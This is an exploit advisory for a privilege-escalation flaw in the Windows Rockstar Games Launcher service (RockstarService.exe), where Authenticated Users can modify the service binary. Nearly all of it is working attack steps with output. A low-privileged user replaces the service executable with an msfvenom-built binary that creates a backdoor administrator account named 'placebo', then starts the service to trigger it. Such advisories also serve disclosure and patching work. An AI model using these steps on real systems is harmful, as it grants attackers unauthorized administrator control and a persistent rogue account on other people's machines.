# Exploit Title: Rockstar Service - Insecure File Permissions  
# Date: 2020-04-02  
# Exploit Author: George Tsimpidas  
# Software Link :  
# Version Patch:  
# Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362  
Vulnerability Description:  
RockstarService.exe suffers from an elevation of privileges vulnerability which can be used by an "Authenticated User" to modify the existing executable file of the service with a binary of his choice. The vulnerability exist due to weak set of permissions being granted to the "Authenticated Users Group" which grants the (M) Flag aka "Modify Privilege"  
D:\Launcher> icacls .\Launcher.exe  
.\Launcher.exe BUILTIN\Administrators:(I)(F)  
NT AUTHORITY\Authenticated Users:(I)(M)  
#1. Create low privileged user & Login to that user  
C:\>net user lowpriv Password123! /add  
C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"  
User name lowpriv  
Local Group Memberships *Users  
Global Group memberships *None  
#2. Move the RockstarService.exe to a new name  
D:\Launcher> move RockstarService.exe RockstarService.exe.bk  
1 file(s) moved.  
#3. Create malicious binary on kali linux with MSF  
msfvenom -f exe -p windows/exec CMD="net user placebo Password123! /add && net localgroup Administrators placebo /add" -o RockstarService.exe  
#4. Transfer created 'RockstarService.exe' to the Windows Host  
#5. Move the created 'RockstarService.exe' binary to the 'D:\Launcher' to replace the old one  
#6. Now start the Service  
Command : net start 'Rockstar Service'  
Now check out that the user has been registered to the system and added to the local group of Administrators  
C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr  
/v "Full"  
User name placebo  
Local Group Memberships *Administrators *Users  
Global Group memberships *None